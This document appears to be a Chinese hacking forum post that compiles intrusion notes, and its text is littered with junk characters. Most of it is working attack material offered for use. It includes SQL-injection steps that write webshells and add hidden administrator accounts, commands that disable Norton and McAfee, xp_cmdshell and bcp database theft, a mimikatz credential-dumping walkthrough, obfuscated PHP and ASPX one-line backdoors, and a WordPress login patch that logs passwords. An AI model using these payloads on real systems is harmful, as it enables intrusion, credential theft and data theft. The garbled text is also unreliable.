3 M+ N: u& z8 V0 p
& \5 y( B$ s6 ^' o1 H6 _中文版本操作系统中针对mysql添加用户完整代码:
& z" P3 e% Q; L: u9 g0 C* y6 @. J# K; I! N
use test;1 s/ g- W+ c8 z) b0 @
create table a (cmd text);
$ P+ {) l0 @3 U: D$ [& O$ s# _insert into a values ("set wshshell=createobject (""wscript.shell"") " );
& [- c" E* _5 finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& H* v: p% s9 B+ Z6 a" w. p
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, D( V4 u2 B7 d7 K7 Xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";: W; R& s! V, v+ t) @5 ~
drop table a;" {& Y/ s R/ Q% U% _' _
4 H% E( d4 ?$ ?& H
英文版本:
6 T$ M* y1 K: X- W& P' W' v0 u: V& |) J T3 P
use test;
' q E9 E0 {+ L: k0 Kcreate table a (cmd text);
8 }5 a; m: Y+ a4 Qinsert into a values ("set wshshell=createobject (""wscript.shell"") " );1 l A2 m7 X$ `3 @1 v- Z1 m7 b3 Z& F
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
n, B1 d* m: d. cinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );& k/ F7 H, l% q
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
6 ], C; p* C. S# I% ~: ^5 M; Ldrop table a;5 z5 j" M X5 d6 n" t
% B& |' _5 d; p$ S! j) }1 pcreate table a (cmd BLOB);
. ~9 e9 i7 @1 o( u& f; H* oinsert into a values (CONVERT(木马的16进制代码,CHAR));+ r6 K! {: M, Z# D: k1 O1 H8 r
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
5 e# m* z2 X) B# ?5 h7 \1 Fdrop table a;
: T, }# f9 b) {* v% y/ u/ I, _4 j) I$ }! l, @) \, L3 e
记录一下怎么处理变态诺顿) w( i) O4 K, f1 S6 v1 P- X: r
查看诺顿服务的路径
7 k! k7 _4 H* n3 m1 Qsc qc ccSetMgr
2 z, k f1 a ?6 J$ S8 m+ _然后设置权限拒绝访问。做绝一点。。/ f) _5 n! ?. L1 U N* Z: p
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system3 O: T1 E3 j! B9 t& \- H9 }7 l- X6 G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
5 O4 @3 Q( a2 r! Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators' ~) L2 {" x4 ]9 ?$ G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
6 M/ \( X4 R: [- E2 c. Y8 n- C8 j9 J" S1 l, X s/ I. u6 X
然后再重启服务器
2 Z( w" n6 ]7 o( k. Piisreset /reboot1 r7 W& d3 a! C- b
这样就搞定了。。不过完事后。记得恢复权限。。。。5 y! O1 I; P* n& M. j W c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
m1 p8 x. Y* a( T- j' acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F" G# m- ~+ \/ Y% U+ j- G; f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
' j6 N8 P8 m7 q5 N: ]$ y. K* fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
8 q" l$ N* {$ V7 Z2 E- OSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
7 \: j1 w, ^# S0 a
6 S5 C$ r2 ?9 WEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')0 j, y& q* @ N4 q
& |, x! P0 ~/ A: G$ L& {! g+ j e
postgresql注射的一些东西
: M8 e7 b# }: }如何获得webshell3 h( G+ X; V% L9 i% C9 U% D! p
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
& m( @- X0 f u& J, xhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 7 Z; S* k" _$ g! h
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;" @ Y: w: E# X: \9 T' k6 p& U
如何读文件6 }/ c; a$ J u- f
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
1 T6 K: ~, ~4 N0 f2 zhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;# x. c! [7 C. e0 K1 {+ i
http://127.0.0.1/postgresql.php?id=1;select * from myfile;# y4 {3 P5 j# e) a- X7 Z
( j1 k2 a. b1 [* h/ ?! j0 R
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
5 p& L- z% p" ^2 ^5 a7 U当然,这些的postgresql的数据库版本必须大于8.X( r/ n; w8 c' a9 s+ C8 d& N
创建一个system的函数:
( X1 t1 ~+ e5 q6 L3 K& C8 S5 W2 RCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT& I- w7 {9 q: D& M& z9 W2 q
' n+ T3 v1 v/ u; X9 P1 Z4 n创建一个输出表:
" e% y. _, k0 B% v8 ~9 O9 WCREATE TABLE stdout(id serial, system_out text)
+ n% L7 W1 i1 c# M
5 f5 h; \& _8 W; m执行shell,输出到输出表内:6 z1 A6 a+ g, u! o, d7 v
SELECT system('uname -a > /tmp/test')
7 L4 |- F. ~7 R4 _" A. ~: V2 T% [8 ^, y3 w( m
copy 输出的内容到表里面;( L( C4 |: g2 p: d) L" \
COPY stdout(system_out) FROM '/tmp/test'3 x/ b' ?+ `& z/ g9 U9 F5 \7 j& s3 x
& }4 N& R, G, H' u, E( D0 `/ C+ o
从输出表内读取执行后的回显,判断是否执行成功+ O, h! V7 R# j; L; b
/ A/ c( b z! }' Z& FSELECT system_out FROM stdout
" l% |: Q* d* n9 S下面是测试例子
" \& x4 |5 x+ o
V; p3 n& W B+ F1 j/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
; C! a+ `3 F+ H- Y, w7 f7 `2 O; W7 f3 i4 [
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'8 t6 U$ ]6 E$ ^; F9 n; g& e2 H7 W
STRICT --
; s; c- M9 M6 r) z$ U5 F1 @
. K: i5 x' r0 p$ M/store.php?id=1; SELECT system('uname -a > /tmp/test') --
, {2 g( g% G- ]( T
# p f' d0 x' h5 v0 X/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --! O5 u3 i; c& k$ h6 d8 Q% P* s
; a( N+ t; }& j. i" F! T, J/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
" Q$ G. L7 s! x( x: ~) i3 j- a Wnet stop sharedaccess stop the default firewall
5 c) K) }. f- h1 A4 Gnetsh firewall show show/config default firewall
' a1 v5 F0 w5 M0 b% J. ?netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall, ]5 e0 ?1 N+ k3 m" }
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
. d* r( e% E. M5 x9 q3 G: z1 }修改3389端口方法(修改后不易被扫出)
3 D6 o$ `9 w. R0 J; k1 G1 g修改服务器端的端口设置,注册表有2个地方需要修改
3 ]1 q% m) E# m& M- W, H7 g0 U. n/ P' m8 F: ?* h
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]: ~ U# ]0 I# \$ c
PortNumber值,默认是3389,修改成所希望的端口,比如60006 W% {6 O4 y5 `9 A! ]
, j& F! V2 P9 ~) c, _9 W
第二个地方:
$ f+ {! D) F) L6 u[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
& l4 P; k* x! }' [0 j0 L' a0 y/ X" M+ fPortNumber值,默认是3389,修改成所希望的端口,比如6000
. l& v2 A0 [2 l# s
1 Q: M2 d" H4 I9 C% i7 @现在这样就可以了。重启系统就可以了8 _: P1 M Q/ z0 c6 L* u* g
5 P* }) e# ^. ]查看3389远程登录的脚本
: g3 J; Y7 i, _- m+ v/ {保存为一个bat文件
" q7 \+ F' S# S1 idate /t >>D:\sec\TSlog\ts.log
% W0 ~* }1 u4 }" w# m! Vtime /t >>D:\sec\TSlog\ts.log7 x' L# X+ N# S1 D! Y) ~: e
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
# h& y( u# G4 h* Q9 w6 Jstart Explorer, h N3 a4 J+ b
* B- W1 E. J4 {& d
mstsc的参数:5 E" [% B' K( l7 o1 f3 l0 J4 M: w' U
3 Z' j$ t" m$ s7 _) I4 ~$ k# A远程桌面连接
8 J# @5 W( a3 k, Y6 U& w! {* Q# W! M( ]$ Q8 D, ^
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
! O+ J# m2 ~9 b: `7 q/ H9 B. s [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
/ V0 S7 K4 r: a H6 i5 H
/ H+ c9 ?) c9 K2 x8 F5 r<Connection File> -- 指定连接的 .rdp 文件的名称。' I: o! A4 u2 A* ?% _3 U
. ?' O3 u7 @2 b W; }
/v:<server[:port]> -- 指定要连接到的终端服务器。$ Q. g* I4 Z: S& ?
5 v: G' }" P. p W
/console -- 连接到服务器的控制台会话。
, l/ o" v* [; r: [' }& ^8 E$ O6 `" V
/f -- 以全屏模式启动客户端。- j1 {/ ^. e. _( V/ b! n" G
4 n6 s5 }! r# O( U% m7 U4 f3 F/w:<width> -- 指定远程桌面屏幕的宽度。
0 a/ M0 n3 v+ t# u2 ^( `8 W+ {# l: {0 n. S, m. _
/h:<height> -- 指定远程桌面屏幕的高度。
8 C/ {; b& Y; D @; q
7 F& ^- B9 B& X, o* W9 [) e/edit -- 打开指定的 .rdp 文件来编辑。
$ H' I& N \6 I! O* ~0 E! V
S3 G8 [8 y; h9 H5 f+ z/migrate -- 将客户端连接管理器创建的旧版% x& o# g. ]5 L/ K `
连接文件迁移到新的 .rdp 连接文件。( G+ W9 s B* M) ~
3 A2 G$ k3 F0 g7 V5 h% X9 k' H
! h( l3 u1 V+ ]) \0 k
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就9 W3 z' h5 I& y, C+ D: i* q
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量2 n. X/ I% \ T N$ T- Z
, l1 ~+ d0 r6 k- { E) Z7 f命令行下开启3389
) w9 I( ]$ O) v3 Unet user asp.net aspnet /add2 e) O/ X" R% X' N/ ]; R' |
net localgroup Administrators asp.net /add3 y: s) n, e( ]; P3 U$ |- S1 @
net localgroup "Remote Desktop Users" asp.net /add& ]3 ], z; f# a/ Z* @! G( T( b: ?/ g
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
; P; r* j: t" v1 [, p+ yecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
2 g( d" A2 P% Becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
1 E4 S/ b, X7 A! G5 z+ n( fecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
5 u" a) }4 K9 v1 `- u( j `% X6 J! @sc config rasman start= auto
+ J& ?. ]- ?2 g2 wsc config remoteaccess start= auto
) B5 ~" s1 U" X1 h9 e4 Vnet start rasman5 p5 }$ w9 r, h1 J& F5 ?
net start remoteaccess
+ Z9 W+ ~3 `* x K0 `Media
# R. V% h5 \+ i$ n' R. w6 o<form id="frmUpload" enctype="multipart/form-data"5 @ }: n7 ?* |' P
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
) U) [! b$ q6 \3 D0 N$ e<input type="file" name="NewFile" size="50"><br>: z- F/ A* s, `
<input id="btnUpload" type="submit" value="Upload">
" R D2 M6 _. }</form>- a8 N& {' j2 ], q( a* f, \
2 ^. {# H( w0 Y f% A' {1 E8 fcontrol userpasswords2 查看用户的密码4 ?9 U6 N- }/ M- i
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
5 E# g+ m' }5 c) _SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: G5 `: I/ P/ J; f7 @0 z/ m; d5 o; `3 b* t" X4 ~, y
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:$ R3 o# J% ^2 x
测试1:& K, L/ {! l- q* P5 R3 Y, x1 Z
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
( J* D* `9 C- c( r
, c' W5 Y8 [9 V5 m, O. ]测试2:
1 t9 s$ E4 M9 H, l
1 ]& A/ {# ?- e& d+ B Z9 ^, I4 rcreate table dirs(paths varchar(100),paths1 varchar(100), id int)5 I _) W' x. o
; I# b) o! f0 ]
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
: A; ~2 b; b7 K1 {+ p
2 b) E* R9 C) S, \4 |SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1+ W- a! L7 l" ]4 m* ~, s
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
7 P$ h. e2 V( x0 ^$ c _! k可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;. m1 e# f$ z$ P' I% g7 P& ]
net stop mcafeeframework
0 {- s7 m! p9 G% |9 A0 _7 v* dnet stop mcshield" e7 p4 ^( f+ x, I; M/ A5 D* U2 ^' g
net stop mcafeeengineservice
' h: Y e' G# `7 _- U) ?4 znet stop mctaskmanager; V, J d' J9 K! X2 R/ ^3 U
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D$ a' z2 X) P) k. v: ^) l2 f0 U. [2 H
4 k! z% K# \! X VNCDump.zip (4.76 KB, 下载次数: 1)
$ [$ }% y3 R! d# K; k$ t! v密码在线破解http://tools88.com/safe/vnc.php
4 @/ T6 i6 j! _( ` b! F" dVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
! d0 D+ P* v& W2 t* Z# U, _ f6 X) N% z3 |0 o
exec master..xp_cmdshell 'net user'# q% k6 l! w0 S1 r* s/ ^: R( ]
mssql执行命令。
. n/ r, n4 {) U1 \获取mssql的密码hash查询
* p2 H' v9 u9 `" M }& X' h( q, xselect name,password from master.dbo.sysxlogins
% u/ Y4 @/ B9 w1 K% T. B- ]: W! x6 J' b# ~% G ]6 M
backup log dbName with NO_LOG;+ s" X* J5 g( P
backup log dbName with TRUNCATE_ONLY;( J5 p. Y6 t9 D1 J* _6 C
DBCC SHRINKDATABASE(dbName);
# f2 f3 R& G* i/ `: omssql数据库压缩
' R4 t5 ~0 G7 v) }+ v- r0 l8 D' Q8 c6 q: t& L' D) j2 f/ v
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
9 I- U: {$ d4 \( p- A/ k# }$ m将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。0 [& T b. k0 M! j) L3 Y8 X" c, v
5 B" R8 t" |- z, t# \, K: e
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
9 ^" P! T8 F3 H# F- m& i A备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
2 F! x) i' @* ]5 ?0 I
3 W4 U# A+ q$ d4 o0 k/ rDiscuz!nt35渗透要点:
- J I! s2 z# ~+ r. r) h(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- I6 T- W: [7 F6 v(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
! a. |/ }7 B3 ?& U; P G$ _(3)保存。
: |* Z# w5 ]& l3 q$ K7 ^0 c(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 F6 h/ u- _. [ r; bd:\rar.exe a -r d:\1.rar d:\website\
, o( \0 M F1 N+ A# r. r9 G4 i& n7 t递归压缩website
+ J" p$ L# r" E# F/ [注意rar.exe的路径
# Q" Q/ s3 A2 D9 R+ u2 @3 v7 q1 u( h! y( C# y8 _9 ?7 v
<?php/ S, A* }1 p- _/ P q+ x& @
6 E" S8 k4 p5 P, ^/ |- q2 W9 c1 `
$telok = "0${@eval($_POST[xxoo])}";
9 B% v. R) \ x5 t# n/ A+ y* n
) b0 d: P0 ] R- y7 f) T* h7 V9 `$username = "123456";6 e. a3 i. D- o
: U% f% J; g# Q, ~. n$userpwd = "123456";
$ g) q E' F6 T9 J6 |) @
/ ~. e: C# N1 b$telhao = "123456";9 u. G, q# Z6 f
; B0 j* A3 l, q# K! l4 `
$telinfo = "123456";
) m+ b' m7 k- T8 ^; u
* `$ C4 Q/ x; U! R5 a8 c9 t?>
7 x5 Q) p! ?! P( `* `. qphp一句话未过滤插入一句话木马
: J5 |3 t, Q0 i2 [/ a% w' V, Z9 M- [ u" s7 [( R: y" n5 L
站库分离脱裤技巧
' Q, _ y( g# lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'0 \* p1 X$ k% i; M5 J3 j
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
7 `7 j' ^& H4 S条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
7 c2 M3 Q+ r1 Z' p* K1 S* l% e5 N. C这儿利用的是马儿的专家模式(自己写代码)。
( q$ m( n* C5 t4 S/ }: kini_set('display_errors', 1);7 H( b/ e; a, L$ w+ L6 a
set_time_limit(0);* x& H* T. q. g. u" E
error_reporting(E_ALL);
6 z# } \/ p0 d9 a$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
! N1 F' y9 d3 b" y4 }9 }mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());& N5 f0 [+ f$ o1 Q& w
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
) U* R N0 p- x7 ~7 O5 D$i = 0;4 _6 }1 ~/ @& g8 q9 a5 X
$tmp = '';# F9 x- Z1 \+ u4 t
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
8 f+ R: F7 D, S, M8 F; C7 }& i $i = $i+1;" ~/ _# c% V0 f8 l
$tmp .= implode("::", $row)."\n";
' w7 a A$ p9 l3 I if(!($i%500)){//500条写入一个文件
2 [. F% @& r" ]; F( R $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
Q$ `* s: w0 y! x6 c file_put_contents($filename,$tmp);
/ ?) ?- K/ ^0 N8 P( h $tmp = '';
% u7 W, W4 v+ T I) w0 G1 p }1 _ j; b9 i0 x8 Y( m" |) c
}
8 w1 U% O# X, |! M8 Pmysql_free_result($result);1 a3 s, Q! k7 _4 d2 e" Z; a, J# m
+ I0 A5 z7 u# K( L+ i6 l
$ Z2 N: m$ t: _* v- T: u, `8 R! G7 v7 d8 @% R
//down完后delete
2 ?$ _. a' w- ~- e
' P/ c# t0 o/ H, N# T- y/ H
+ ~6 R4 a9 R+ Pini_set('display_errors', 1);* Z) K N% m+ o2 {' `
error_reporting(E_ALL);
/ v0 n0 T1 P: E& c: B. `$i = 0;* l2 l# i: e3 |& r
while($i<32) {
* ?' ?7 u6 {( n2 }/ o $i = $i+1;
3 v) H8 p# J8 a }7 R8 G" u' w5 H $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';' z! b8 ~: N) p* w1 |4 N
unlink($filename);0 K; T' t9 p) R) s6 U5 H/ g* z
}
% ]* W' C5 M d; o* k3 qhttprint 收集操作系统指纹
3 m/ U. e2 Y! {* h+ L7 i扫描192.168.1.100的所有端口
/ K, q% c: V( J/ i5 Unmap –PN –sT –sV –p0-65535 192.168.1.100
0 w' t( o& u: ~host -t ns www.owasp.org 识别的名称服务器,获取dns信息" z& j' y5 B. k. |2 m4 Z- ]7 ]1 ?. S8 m0 ~
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输1 G% T3 |0 h( y% {2 a. `
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
1 v3 R8 M6 l7 {) R) T$ V& {
) L( X) Q2 C2 k% K+ EDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, r- r2 }% g( i0 z6 W, E6 T" Y, u6 a4 I+ Y
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( o* V6 o8 w. Y: Q
# m2 V9 A8 j# U* e6 g7 t7 Q Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x. B9 }) C" @- P; J( l4 f
a/ V0 g) G2 n$ U3 I DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)8 M4 v6 u G* t, Y8 w3 L
# v1 i1 d, ]" ` http://net-square.com/msnpawn/index.shtml (要求安装)
7 \ u; Q: X& B/ U o
. o2 G& c' l3 ~9 P, a" |) R. e tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)7 G g+ g" ]" ?0 N, _$ r1 n
5 U% D- K8 K9 n3 ]4 B1 e* C
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)/ s _1 J# A! E; y, T
set names gb2312, Q% c% q% U- X
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' Y: k3 p) m1 P' {# z2 m; B1 K- h1 i6 Z, g u
mysql 密码修改/ R/ Q# q$ M/ K; H, L7 D& b$ W' |) |
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 8 q0 w! T' D0 \
update user set password=PASSWORD('antian365.com') where user='root';# A8 n% w. D3 I; M9 h
flush privileges;
) W# ]# |3 ^9 u- G. i. w$ m. S9 x+ l3 }高级的PHP一句话木马后门
7 J C* q9 `$ ?* i ?: R% A& s$ }3 Z- g0 q# z
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀! ~5 B1 G3 o5 R8 I
2 p6 h' s6 k4 h) G( b% q1、 C6 Y2 N$ [) `+ F
# [. s* D) d& c/ P7 ]$ J0 t
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";/ l; T, R! _: ]7 T
1 H1 w1 f# s* e. T4 `$hh("/[discuz]/e",$_POST['h'],"Access");
" T" K9 V' w7 P9 j# ^ G2 M
6 h9 V! A& e1 o2 p& `1 [5 c//菜刀一句话
, n0 w* F$ j, C
8 _4 m- z7 l8 U4 r6 b6 M2、5 l/ \2 z: [' A# _: u2 `' H
9 k# g; E5 D$ Y+ B3 o4 p
$filename=$_GET['xbid'];
8 k& \1 k) v3 L; p
; X2 j0 n) u/ \# F# B3 G/ Binclude ($filename);* a* F( K) A' o5 G. K) M$ S
) ]! [% D& s- E- R. A3 G! B9 {
//危险的include函数,直接编译任何文件为php格式运行. x/ |: U" q* f" D v* S
" y5 L& E6 B- H0 n3、
3 Q5 h% k6 H* {. }# Y8 g
8 h4 n: X) P5 h% X- S ]$reg="c"."o"."p"."y";, }8 X6 Z" A: ]& q
9 j7 P$ A( S& ]( \" C3 T5 P
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);8 _1 u- Y" E' D, [) V& I, R
! H; o) w1 G8 g- L+ m/ W
//重命名任何文件
0 i* G% b0 V* w) p; V
9 Y" a3 \& k0 H0 q9 o/ |. f4、
/ `* H, z6 j4 T1 z' ?, ^! S4 |5 }8 f. d1 F) a
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";+ C: S& [! f. y" T, g
: X0 A; h9 j5 k1 s. a& d
$gzid("/[discuz]/e",$_POST['h'],"Access");0 ?) Z q* `5 h% K8 v# N
8 c6 j1 L& u8 H/ L" N" \& U//菜刀一句话' V9 O" ?5 b* g9 ^2 q4 y
0 b) A9 u, }: o' f1 s9 R# s9 m; h) t5、include ($uid);
* g6 J; \2 A8 s* v
% J- `0 }# M- x) ^, v//危险的include函数,直接编译任何文件为php格式运行,POST
. O9 p! g# F) u/ c- y% q& Q8 K2 a4 x% m9 ~4 Y
9 v: T! A$ [; b" b
//gif插一句话& Z3 N7 [: E* x( {7 F
% H# P* x. c5 }9 z
6、典型一句话
9 S: g$ c7 |" V; x
* R. X2 [3 E5 q$ G( R程序后门代码
7 C0 f1 m3 a& `! n$ K& K5 M<?php eval_r($_POST[sb])?>2 h$ L, |2 Q- ?: Y/ }! ]
程序代码6 |# n4 ]% H+ h. J
<?php @eval_r($_POST[sb])?>
1 x1 K x! v# S9 T6 [+ S; _& A//容错代码 F% m' D9 J! k/ ]
程序代码( F" M/ ]( V4 t2 x! A n
<?php assert($_POST[sb]);?>
. f4 Z8 e P" K T//使用lanker一句话客户端的专家模式执行相关的php语句+ I# j7 B0 w- l- j7 d
程序代码
2 S x8 r, w9 S6 ^% O) d( M<?$_POST['sa']($_POST['sb']);?>
1 W! l7 ?! o& S& M# k) s程序代码* G0 V; M2 y5 n8 i& L/ y. Y
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>3 _8 J8 p" }/ a- v
程序代码( A- J, ]4 q6 T' x; y4 f2 N
<?php1 H: `' i# O6 H. w* F' p
@preg_replace("/[email]/e",$_POST['h'],"error");
( n0 r7 ~ }2 X6 y( _; S?>
+ q4 c, C. W' O6 I//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入! a7 L: U: d c' z7 W% [& n6 x: I
程序代码
: o. L3 [* O: G% J6 D5 i U6 H5 }<O>h=@eval_r($_POST[c]);</O>
7 I K- I. z6 k程序代码: V3 m# l* a3 c- w! t: o+ Z
<script language="php">@eval_r($_POST[sb])</script>% q% m. T2 E% C2 ~* [6 u
//绕过<?限制的一句话
U2 y' V5 V* a$ q6 A. a, z3 A
- v8 B1 [& F2 k- v; Ahttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip2 d4 k9 R7 [8 ^
详细用法:" ^3 ]$ W. \' c
1、到tools目录。psexec \\127.0.0.1 cmd% ], @6 h+ f7 `5 Y g: b
2、执行mimikatz
; k' D* v, Z9 t4 N( \3、执行 privilege::debug
6 ~8 l( O& M8 x3 }) |% W. x4、执行 inject::process lsass.exe sekurlsa.dll$ W$ ]( \7 C0 |
5、执行@getLogonPasswords
/ H% g- u" Z1 F! v1 M6、widget就是密码
1 ~" u/ x: I5 G) b7、exit退出,不要直接关闭否则系统会崩溃。
2 N' M" ?7 y/ D$ c( M
% Y6 x5 ~- p( q4 Phttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
! S% @7 Q! O. b; p, E4 c2 f9 j7 R! E" _* R7 X
自动查找系统高危补丁5 d1 l: x/ ?9 x" a3 Z v$ J$ l
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt0 i) t1 @' i: N1 U1 z/ O
, x! f5 _' \9 u突破安全狗的一句话aspx后门
K+ V, P" R0 ^1 C, C4 R: B<%@ Page Language="C#" ValidateRequest="false" %>3 _4 t, R) q. `) B2 e9 n% E6 L
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
% z4 F! P+ ]. a( a4 F9 p2 Kwebshell下记录WordPress登陆密码1 @9 k6 r# Y c0 g v8 H6 V
webshell下记录Wordpress登陆密码方便进一步社工
! z7 i% t5 y/ h在文件wp-login.php中539行处添加:
O4 |0 L9 ~. u/ L' ~// log password
1 p+ O+ ^3 J% c; D$log_user=$_POST['log'];
7 u1 _2 B m4 w; F; d0 A$log_pwd=$_POST['pwd'];
, n. Y- e% M# Y6 j$log_ip=$_SERVER["REMOTE_ADDR"];+ v T: T4 P$ X% N2 f
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;- x) N3 f9 @+ s' q7 f- |" ^0 N; H
$txt=$txt.”\r\n”;
* V0 g# I& x( P% `' B' `9 @. jif($log_user&&$log_pwd&&$log_ip){% u* `0 D; Y$ j) f7 h
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);) R8 c& @- ~% |! Q8 c2 v
}
) i- t; g1 P) }" U/ \4 B0 ]当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
